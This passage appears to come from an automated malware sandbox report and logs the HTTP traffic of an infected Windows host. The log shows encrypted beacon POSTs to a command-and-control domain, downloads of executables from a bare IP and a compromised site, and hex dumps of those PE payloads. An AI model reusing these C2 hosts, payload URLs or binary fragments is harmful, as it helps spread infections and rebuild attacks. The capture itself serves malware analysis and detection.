6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    4192.168.2.449699211.171.233.12980C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:05.929245949 CET142OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://fjuand.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 293
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:05.929267883 CET143OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 2d 40 a2 a6
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu-@wNsw\13*uk9GZ[8N3u%6hn[\0sq8lQ[&*BNh7R\a
                    Nov 24, 2022 20:13:07.234910011 CET143INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:06 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    5192.168.2.449700109.102.255.23080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:07.766982079 CET144OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ugahgtu.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 177
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:07.767508030 CET145OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 35 45 d9 82
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu5EOGPcEB].7@C}4x1,&z+Z%yg5M(`K L@L
                    Nov 24, 2022 20:13:08.075387001 CET145INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:07 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 43
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 59 39 08 a6 6d 59 b5 ab 15 bd cf b5 fa 6d 86 21 da ec 71 14 10 94 8f
                    Data Ascii: #\(Y9mYm!q


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    6192.168.2.449701123.253.32.17080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:08.363487005 CET146OUTGET /root2.exe HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Host: 123.253.32.170
                    Nov 24, 2022 20:13:08.644607067 CET147INHTTP/1.1 200 OK
                    Server: nginx/1.14.2
                    Date: Thu, 24 Nov 2022 19:13:08 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1041408
                    Last-Modified: Thu, 24 Nov 2022 19:10:04 GMT
                    Connection: keep-alive
                    ETag: "637fc18c-fe400"
                    Accept-Ranges: bytes
                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 57 b6 e1 fb 13 d7 8f a8 13 d7 8f a8 13 d7 8f a8 ae 98 19 a8 12 d7 8f a8 0d 85 1a a8 0c d7 8f a8 0d 85 0c a8 96 d7 8f a8 34 11 f4 a8 1a d7 8f a8 13 d7 8e a8 87 d7 8f a8 0d 85 0b a8 3d d7 8f a8 0d 85 1b a8 12 d7 8f a8 0d 85 1e a8 12 d7 8f a8 52 69 63 68 13 d7 8f a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8d 67 92 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 9e 01 00 00 3a 30 00 00 00 00 00 e6 6f 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 31 00 00 04 00 00 0d 84 10 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c a0 01 00 64 00 00 00 00 80 31 00 e8 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 3c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9c 01 00 00 10 00 00 00 9e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 cf 2f 00 00 b0 01 00 00 12 0e 00 00 a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 2e 00 00 00 80 31 00 00 30 00 00 00 b4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa a8 01
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$W4=RichPELgb:0o@1\d1.pP<@ .text `.data/@.rsrc.10@@
                    Nov 24, 2022 20:13:08.644655943 CET148INData Raw: 00 00 00 00 00 90 a8 01 00 00 00 00 00 30 a3 01 00 46 a3 01 00 5a a3 01 00 68 a3 01 00 86 a3 01 00 94 a3 01 00 b2 a3 01 00 ca a3 01 00 e2 a3 01 00 f4 a3 01 00 0a a4 01 00 24 a4 01 00 30 a4 01 00 44 a4 01 00 52 a4 01 00 64 a4 01 00 7c a4 01 00 90
                    Data Ascii: 0FZh$0DRd|$2J\t "BXl8Pdx
                    Nov 24, 2022 20:13:08.644696951 CET150INData Raw: 00 00 00 67 75 6b 75 73 6f 6d 6f 74 61 77 65 78 61 20 6b 65 66 75 78 61 67 65 6a 69 72 65 20 74 61 73 75 78 6f 72 69 64 6f 74 69 76 61 6b 6f 6e 75 78 61 77 6f 20 67 69 6e 65 63 69 70 00 00 66 75 6e 69 6c 75 6c 61 73 65 62 65 64 75 77 69 76 6f 6d
                    Data Ascii: gukusomotawexa kefuxagejire tasuxoridotivakonuxawo ginecipfunilulasebeduwivomepabajuyudotulohasikoberapDef molesucusecapihayarohawoferigan cifonasekuwifi sujakuxozos
                    Nov 24, 2022 20:13:08.644737959 CET151INData Raw: 3f 00 00 00 00 00 42 ea 3f 00 00 00 00 00 42 ea 3f 00 00 00 00 00 ec e9 3f 00 00 00 00 00 ec e9 3f 00 00 00 00 00 9a e9 3f 00 00 00 00 00 9a e9 3f 00 00 00 00 00 48 e9 3f 00 00 00 00 00 48 e9 3f 00 00 00 00 00 fa e8 3f 00 00 00 00 00 fa e8 3f 00
                    Data Ascii: ?B?B?????H?H?????b?b???????F?F???????B?B?
                    Nov 24, 2022 20:13:08.644783020 CET152INData Raw: e9 d7 3f 89 f2 43 67 f9 af 3f 3d 00 30 89 8a d3 98 d8 3f 57 2f 1e 07 66 f6 31 3d 00 60 03 28 04 4a d9 3f 44 6b 8c b0 bc e7 30 3d 00 68 bf f4 23 f1 d9 3f 1f 40 f2 15 20 89 36 3d 00 80 db ab fc 99 da 3f 11 a3 87 5f 9c e8 11 3d 00 88 14 7c 97 44 db
                    Data Ascii: ?Cg?=0?W/f1=`(J?Dk0=h#?@ 6=?_=|D?&?4j<='?Qn&=?l=6?DX,4=?-Q2=xbt?WE<.l?7w,=?l>=%?Nl,"=@\r??t8=85R?
                    Nov 24, 2022 20:13:08.644825935 CET154INData Raw: 2e 0d 0a 00 00 52 36 30 33 32 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 6c 6f 63 61 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0d 0a 00 00 00 00 00 00 52 36 30 33 31 0d 0a 2d 20 41 74 74 65 6d 70 74 20 74 6f 20 69
                    Data Ascii: .R6032- not enough space for locale informationR6031- Attempt to initialize the CRT more than once.This indicates a bug in your application.R6030- CRT not initializedR6028- unable to initialize heapR6027- n
                    Nov 24, 2022 20:13:08.644870996 CET155INData Raw: 43 6c 61 73 73 20 48 69 65 72 61 72 63 68 79 20 44 65 73 63 72 69 70 74 6f 72 27 00 00 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 41 72 72 61 79 27 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 00 20 54 79
                    Data Ascii: Class Hierarchy Descriptor' Base Class Array' Base Class Descriptor at ( Type Descriptor'`local static thread guard'`managed vector copy constructor iterator'`vector vbase copy constructor iterator'`vector copy constructor ite
                    Nov 24, 2022 20:13:08.644956112 CET156INData Raw: 00 20 6e 65 77 00 00 00 00 5f 5f 75 6e 61 6c 69 67 6e 65 64 00 5f 5f 72 65 73 74 72 69 63 74 00 00 5f 5f 70 74 72 36 34 00 5f 5f 63 6c 72 63 61 6c 6c 00 00 00 5f 5f 66 61 73 74 63 61 6c 6c 00 00 5f 5f 74 68 69 73 63 61 6c 6c 00 00 5f 5f 73 74 64
                    Data Ascii: new__unaligned__restrict__ptr64__clrcall__fastcall__thiscall__stdcall__pascal__cdecl__based(.@.@.@t.@h.@\.@P.@H.@<.@0.@-.@p)@T)@@)@ )@)@(.@ .@.@.@.@.@.@.@.@-@-@-@-@-@-
                    Nov 24, 2022 20:13:08.645013094 CET158INData Raw: 00 00 00 00 00 00 00 00 00 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 28 00 28 00 28 00 28 00 28 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 48 00 10 00 10 00 10
                    Data Ascii: ((((( H
                    Nov 24, 2022 20:13:08.645055056 CET159INData Raw: 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4
                    Data Ascii: stuvwxyz{|}~
                    Nov 24, 2022 20:13:08.925841093 CET160INData Raw: 3d 40 00 60 3d 40 00 00 00 00 00 60 a9 4f 00 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 28 3d 40 00 7c a9 4f 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 7c 3d 40 00 00 00 00 00 00 00 00 00 01 00 00 00 8c 3d 40
                    Data Ascii: =@`=@`O@(=@|O@|=@=@`=@O=@=@=@`=@O@=@O=@>@>@=@`=@O@


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    7192.168.2.44970295.107.163.4480C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:14.645796061 CET1236OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://cbcxtvmmly.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 253
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:14.645796061 CET1236OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 09 6b 2c 90 f4 76 0b 75 59 51 ca af
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA ,[k,vuYQs-SgiLf`f_@m6]=]&209OD`dG3VlM,}J-53)3NoRYYaof#E!
                    Nov 24, 2022 20:13:14.799427986 CET1237INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:14 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    8192.168.2.449703109.102.255.23080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:14.908205986 CET1238OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://jmhsk.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 227
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:14.908343077 CET1238OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 24 29 f3 96
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu$)LBtuFf'(("YrJ>DN7Q/\/'deD]S7##&ZM$%u
                    Nov 24, 2022 20:13:15.188304901 CET1239INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:15 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    9192.168.2.44970495.107.163.4480C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:15.651551962 CET1240OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://cxmexebq.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 312
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:15.651583910 CET1240OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 27 1e c2 bb
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu'n:UTj<f_QoQWGoL`9FU~7CVV_B&{Ba<L>@rzDbRFdUFO<gryfE
                    Nov 24, 2022 20:13:15.837204933 CET1241INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:15 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.4497155.135.247.111443C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    2022-11-24 19:13:26 UTC0OUTGET /upload/index.php HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Host: thepokeway.nl
                    2022-11-24 19:13:26 UTC0INHTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:26 GMT
                    Server: Apache
                    Content-Description: File Transfer
                    Content-Disposition: attachment; filename=1d58f3b6.exe
                    Content-Transfer-Encoding: binary
                    Expires: 0
                    Cache-Control: must-revalidate
                    Pragma: public
                    Vary: Accept-Encoding
                    Connection: close
                    Transfer-Encoding: chunked
                    Content-Type: application/octet-stream
                    2022-11-24 19:13:26 UTC0INData Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 57 b6 e1 fb 13 d7 8f a8 13 d7 8f a8 13 d7 8f a8 ae 98 19 a8 12 d7 8f a8 0d 85 1a a8 0c d7 8f a8 0d 85 0c a8 96 d7 8f a8 34 11 f4 a8 1a d7 8f a8 13 d7 8e a8 87 d7 8f a8 0d 85 0b a8 3d d7 8f a8 0d 85 1b a8 12 d7 8f a8 0d 85 1e a8 12 d7 8f a8 52 69 63 68 13 d7 8f a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 91
                    Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$W4=RichPEL
